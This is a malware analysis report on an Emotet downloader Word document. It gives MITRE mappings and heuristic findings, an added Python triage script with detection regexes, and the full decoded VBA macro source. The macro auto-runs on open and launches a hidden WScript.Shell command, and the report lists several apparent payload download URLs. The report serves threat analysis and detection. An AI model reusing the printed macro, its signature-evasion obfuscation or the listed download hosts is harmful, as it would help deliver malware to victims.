Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution
Note: the findings below show macro execution, not a parser exploit. Nothing runs until the user enables macros, which ATT&CK maps to T1204.002 User Execution: Malicious File; the WordBasic heuristic below likewise declines to attribute a parser CVE.
The sample is a malicious Word document carrying VBA macros. The entry point is Sub autoopen() in module matrix80, which runs when the document opens; it invokes Flats38() by listing it inside an Array(...) initialiser. Flats38() builds the ProgID from string fragments around the mixed-case literal "WscRipt.sHeLl" (case mangling aimed at exact-match string scanners; COM ProgID lookup is case-insensitive, so it still resolves to WScript.Shell), passes it to CreateObject, and calls the resulting object's Run method. The command line is itself concatenated from variables plus Soft50.TextBox1, a form control on the ThisDocument module (Soft50, VB_Base "1Normal.ThisDocument"), and the window-style argument GcbiW is set to 0, so the spawned process runs with a hidden window. The many Select Case blocks of dead arithmetic around these statements are filler meant to dilute signatures. Together this is the pattern of a macro downloader that fetches and executes a second-stage payload, and the ClamAV detection Doc.Downloader.Emotet-10022072-0 supports attribution to the Emotet family.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-10022072-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-10022072-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code.
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]. Matched line in script (with surrounding context):
    End Select
    Manager29 = "" + SavingsAccount92 + implementation34 + digital65 + Kansas96 + "WscRipt.sHeLl" + Associate75 + SleekCottonKeyboard30
    Select Case Fort59
- CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched line in script (with surrounding context):
    End Select
    redundant65 = Array(SavingsAccount15, Small73, Avon82, CreateObject("" + SDD18 + Cambridgeshire64 + Brand2 + Manager29).Run!("" + Customer2 + Ergonomic35 + synthesize43 + Soft50.TextBox1 + Developer46 + cyan47 + payment13, GcbiW), feed80, Ecuador83, Architect78)
    Select Case content16
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Source extraction succeeded for this sample, so here the finding corroborates the visible autoopen/CreateObject/Run chain rather than standing in for missing source.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script (with surrounding context):
    Attribute VB_Name = "matrix80"
    Sub autoopen()
    Future91 = Global19
- Reference to Windows Script Host [high, SC_STR_WSCRIPT].
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (macros.bas, below), so this marker adds nothing beyond the AutoOpen finding.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three entries were found in document text (OLE body):
    http://www.binsuloomgroup.com/wp-content/uploads/TyUg_qOsCOz4O_5uPw9YSbO@http://bonnyprint.com
    http://ftp.spbv.org/worem_2o27v_d@http://flowersgalleryevents.ayansaha.com/2Z4fO_YmAY_BqDF1wD@https://anhle.art/t2ZZ_zOxsnfkSJ_ClUxs
    http://schemas.openxmlformats.org/drawingml/2006/main
  Read the first two entries as five distinct download locations (binsuloomgroup.com, bonnyprint.com, ftp.spbv.org, flowersgalleryevents.ayansaha.com, anhle.art) joined with '@', the delimiter Emotet's loader stage is known to split its fallback URL list on; the extractor kept each run as one URL because '@' is legal in a URL's userinfo part. The third entry is the DrawingML XML namespace and is benign.
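A text-only triage helper, added here as an example and not part of this report or of oletools, that re-derives the three macro findings above from olevba's decoded source (auto-exec entry point, case-mangled WScript.Shell ProgID, CreateObject(...).Run with its window-style argument resolved) and unpacks the '@'-joined URL strings into individual download locations. Its input is a constructed abridgement of the extracted macros.bas with the junk Select Case blocks removed plus the three URL strings the report lists; the regexes, the benign-host list and the window-style table are assumptions made for this example, not the analyzer's rules, and it does no p-code analysis, so it would miss the OLE_VBA_PCODE_AUTOEXEC_EXEC case on a stomped document.

```python
"""Text-only triage of VBA source recovered by olevba (added example, not part of the report).

Re-derives three findings the report's heuristics fired on:
  * an auto-execution entry point (Sub autoopen),
  * a case-mangled "WScript.Shell" ProgID literal,
  * CreateObject(...).Run(...) with its window-style argument resolved (0 = hidden),
and splits the '@'-joined download-URL strings that the URL extractor kept whole.
Detection patterns, the benign-host list and the window-style table are assumptions
made for this example; they are not the analyzer's own rules.
"""
import re

# Constructed input: an abridgement of the report's extracted macros.bas with the
# junk Select Case blocks removed. The three interesting statements are verbatim.
SAMPLE_VBA = r'''Attribute VB_Name = "deliverables31"
Function Flats38()
On Error Resume Next
Manager29 = "" + SavingsAccount92 + implementation34 + digital65 + Kansas96 + "WscRipt.sHeLl" + Associate75 + SleekCottonKeyboard30
GcbiW = 0
redundant65 = Array(SavingsAccount15, Small73, Avon82, CreateObject("" + SDD18 + Cambridgeshire64 + Brand2 + Manager29).Run!("" + Customer2 + Ergonomic35 + synthesize43 + Soft50.TextBox1 + Developer46 + cyan47 + payment13, GcbiW), feed80, Ecuador83, Architect78)
End Function
Attribute VB_Name = "matrix80"
Sub autoopen()
Future91 = Global19
proactive51 = Array(Borders39, Trail72, MoneyMarketAccount78, Flats38, Central27, GorgeousWoodenBacon33, grow28)
Ville95 = analyzer99
End Sub
'''

# The three URL strings exactly as the report's extractor emitted them.
REPORTED_URL_STRINGS = [
    'http://www.binsuloomgroup.com/wp-content/uploads/TyUg_qOsCOz4O_5uPw9YSbO@http://bonnyprint.com',
    'http://ftp.spbv.org/worem_2o27v_d@http://flowersgalleryevents.ayansaha.com/2Z4fO_YmAY_BqDF1wD@https://anhle.art/t2ZZ_zOxsnfkSJ_ClUxs',
    'http://schemas.openxmlformats.org/drawingml/2006/main',
]

AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(autoopen|auto_open|autoexec|autoclose|document_open|workbook_open)\s*\(',
    re.I | re.M)
# Case-insensitive on purpose: the sample spells the ProgID "WscRipt.sHeLl".
WSH_LITERAL_RE = re.compile(r'"([^"]*wscript\.shell[^"]*)"', re.I)
# CreateObject(<expr>).Run( or .Run!( ; the match ends right after the opening parenthesis.
CREATEOBJECT_RUN_RE = re.compile(r'CreateObject\s*\(.*?\)\s*\.\s*Run\s*!?\s*\(', re.I)
CONTROL_REF_RE = re.compile(r'\b(\w+\.TextBox\d+)\b', re.I)

# WScript.Shell.Run intWindowStyle values that matter for triage (assumed subset).
WINDOW_STYLES = {0: 'hidden', 1: 'normal', 2: 'minimized', 3: 'maximized', 7: 'minimized, no focus'}
# XML namespace hosts the extractor reports that are not download locations (assumption).
BENIGN_URL_HOSTS = {'schemas.openxmlformats.org', 'schemas.microsoft.com', 'www.w3.org'}


def _call_args(text, pos):
    """Split the top-level, comma-separated arguments of a call whose '(' ends at pos."""
    depth, in_str, args, cur = 0, False, [], []
    for ch in text[pos:]:
        if in_str:                       # inside a string literal; a doubled quote reads as
            cur.append(ch)               # close-then-reopen, which is harmless for paren tracking
            in_str = ch != '"'
            continue
        if ch == '"':
            in_str = True
        elif ch == '(':
            depth += 1
        elif ch == ')':
            if depth == 0:
                args.append(''.join(cur).strip())
                return args
            depth -= 1
        elif ch == ',' and depth == 0:
            args.append(''.join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    raise ValueError('unbalanced call expression')


def _resolve_int(text, expr):
    """Resolve an integer argument: a literal, or a variable assigned an integer literal in the source."""
    expr = expr.strip()
    if re.fullmatch(r'\d+', expr):
        return int(expr)
    m = re.search(r'^\s*' + re.escape(expr) + r'\s*=\s*(\d+)\s*$', text, re.I | re.M)
    return int(m.group(1)) if m else None


def triage(vba_text):
    """Return the findings for one decoded VBA project as a dict."""
    result = {
        'autoexec': [m.group(1).lower() for m in AUTOEXEC_RE.finditer(vba_text)],
        'wsh_literals': WSH_LITERAL_RE.findall(vba_text),
        'run_args': None, 'run_window_style': None, 'run_window_name': None,
        'command_from_control': [],
    }
    m = CREATEOBJECT_RUN_RE.search(vba_text)
    if m:
        args = _call_args(vba_text, m.end())
        result['run_args'] = args
        result['command_from_control'] = CONTROL_REF_RE.findall(args[0])   # command read from a form control
        if len(args) >= 2:
            style = _resolve_int(vba_text, args[1])
            result['run_window_style'] = style
            result['run_window_name'] = WINDOW_STYLES.get(style)
    result['verdict'] = ('downloader-like macro' if result['autoexec'] and result['wsh_literals'] and m
                         else 'no match')
    return result


def split_url_list(blob):
    """Split an '@'-joined URL string into its members, dropping XML-namespace URLs."""
    kept = []
    for url in re.split(r'@(?=https?://)', blob.strip()):
        host = re.match(r'https?://([^/]+)', url, re.I)
        if host and host.group(1).lower() in BENIGN_URL_HOSTS:
            continue
        kept.append(url)
    return kept


if __name__ == '__main__':
    for key, value in triage(SAMPLE_VBA).items():
        print(f'{key}: {value}')
    for blob in REPORTED_URL_STRINGS:
        for url in split_url_list(blob):
            print('download location:', url)
```

Run it against `olevba --decode` output of any document to get the same four signals; a ProgID assembled entirely from variables (no literal at all) would defeat WSH_LITERAL_RE, which is exactly the gap the report's p-code and string-scan heuristics exist to cover.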
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5833 bytes |

SHA-256 of macros.bas: 809fbc0d3180c3d024dc84b49918f1a1b34a8902e3cf51170d3d2570e4b1482e
Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "Soft50"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "deliverables31"
Function Flats38()
On Error Resume Next
Select Case FantasticSteelPizza43
Case 248
CreditCardAccount10 = CLng(978)
Dynamic25 = attitudeoriented58
multistate88 = CDate(skyblue78)
bluetooth40 = multibyte80
Borders2 = Int(653)
Case 612
LicensedFrozenSalad18 = bypassing8
Cameroon62 = Cos(Agent5)
SavingsAccount97 = helpdesk64
PCI10 = ChrB(126)
microchip76 = calculating94
End Select
Select Case Mobility69
Case 928
integrated81 = CLng(869)
internetsolution14 = NewYork60
Nevada95 = CDate(transition30)
UnbrandedWoodenChicken81 = Agent8
userfacing40 = Int(970)
Case 598
Intelligent41 = calculating83
Congo91 = Cos(tangible93)
Burg23 = monitor86
Practical37 = ChrB(83)
Mill38 = Congo75
End Select
Select Case PersonalLoanAccount62
Case 674
navigating93 = CLng(27)
evolve85 = ElectronicsShoes57
withdrawal70 = CDate(Avon73)
enterprise67 = withdrawal16
Investor30 = Int(71)
Case 152
transmit50 = Sports63
gold7 = Cos(ROI67)
morph36 = Research78
HomeLoanAccount2 = ChrB(421)
engage64 = Cambridgeshire48
End Select
Manager29 = "" + SavingsAccount92 + implementation34 + digital65 + Kansas96 + "WscRipt.sHeLl" + Associate75 + SleekCottonKeyboard30
Select Case Fort59
Case 181
Tasty45 = CLng(781)
invoice78 = sexy69
haptic21 = CDate(Plastic64)
invoice59 = indexing44
circuit64 = Int(752)
Case 98
Wall1 = Berkshire88
Frontline48 = Cos(Tunnel52)
Marketing83 = Glen77
pixel94 = ChrB(974)
payment37 = Product96
End Select
Select Case port81
Case 974
COM69 = CLng(577)
Officer7 = turquoise23
fullrange2 = CDate(Hills52)
blue15 = tertiary27
copying56 = Int(335)
Case 711
cyan86 = synthesizing90
National90 = Cos(system97)
UnbrandedSoftPants8 = Wells7
MoneyMarketAccount16 = ChrB(666)
Bedfordshire7 = technologies80
End Select
GcbiW = 0
Select Case Paradigm24
Case 176
transmitter57 = CLng(440)
SQL13 = auxiliary83
GardenShoesIndustrial14 = CDate(lavender77)
Serbia62 = NetherlandsAntilles8
SmallGraniteTowels67 = Int(734)
Case 952
Intelligent89 = Toys48
wireless1 = Cos(Montenegro55)
Burgs16 = white86
Washington70 = ChrB(798)
array79 = Tala81
End Select
Select Case Frozen34
Case 757
Crescent79 = CLng(491)
payment75 = black13
compressing5 = CDate(synergies44)
HomeLoanAccount34 = Walk30
NorthDakota57 = Int(245)
Case 190
override83 = green59
Virginia21 = Cos(TastyGraniteBall42)
MoneyMarketAccount5 = Oklahoma70
Berkshire36 = ChrB(886)
Wyoming72 = SDD48
End Select
Select Case AI14
Case 548
calculate5 = CLng(93)
Stream15 = contextuallybased3
Grassroots53 = CDate(realtime93)
UnbrandedFrozenChicken33 = Accountability58
opensource7 = Int(858)
Case 841
Dale86 = Multilateral55
virtual27 = Cos(ROI98)
CreditCardAccount59 = Product1
turquoise64 = ChrB(158)
Soft30 = Turkmenistan82
End Select
redundant65 = Array(SavingsAccount15, Small73, Avon82, CreateObject("" + SDD18 + Cambridgeshire64 + Brand2 + Manager29).Run!("" + Customer2 + Ergonomic35 + synthesize43 + Soft50.TextBox1 + Developer46 + cyan47 + payment13, GcbiW), feed80, Ecuador83, Architect78)
Select Case content16
Case 831
HandcraftedGraniteHat14 = CLng(168)
drive71 = HomeComputersOutdoors2
IncredibleMetalBike94 = CDate(AwesomeCottonSoap52)
withdrawal77 = Refined37
Web25 = Int(987)
Case 460
Delaware93 = Executive38
Island74 = Cos(Metal64)
payment91 = Loaf40
FantasticPlasticSalad8 = ChrB(267)
matrix1 = payment47
End Select
Select Case w1080p31
Case 561
interactive34 = CLng(464)
solidstate37 = highlevel33
MoneyMarketAccount66 = CDate(Ergonomic52)
lime12 = Nebraska38
integrated24 = Int(373)
Case 725
NewMexico60 = Small17
connect81 = Cos(skyblue25)
Executive76 = Fresh75
Unbranded10 = ChrB(246)
RhodeIsland50 = Unbranded25
End Select
Select Case quantifying58
Case 626
SportsOutdoorsJewelery54 = CLng(752)
Ramp98 = Assistant24
firewall36 = CDate(IncredibleSoftSausages64)
IntelligentConcreteBacon21 = valueadded59
Trafficway55 = Int(772)
Case 454
Phased36 = JBOD21
PapuaNewGuinea71 = Cos(invoice17)
AwesomeMetalPizza72 = CheckingAccount47
capacitor13 = ChrB(454)
syndicate74 = HandmadeGraniteChicken34
End Select
End Function
Attribute VB_Name = "matrix80"
Sub autoopen()
Future91 = Global19
proactive51 = Array(Borders39, Trail72, MoneyMarketAccount78, Flats38, Central27, GorgeousWoodenBacon33, grow28)
Ville95 = analyzer99
End Sub
Function Bedfordshire97()
Cambridgeshire68 = SMS14
End Function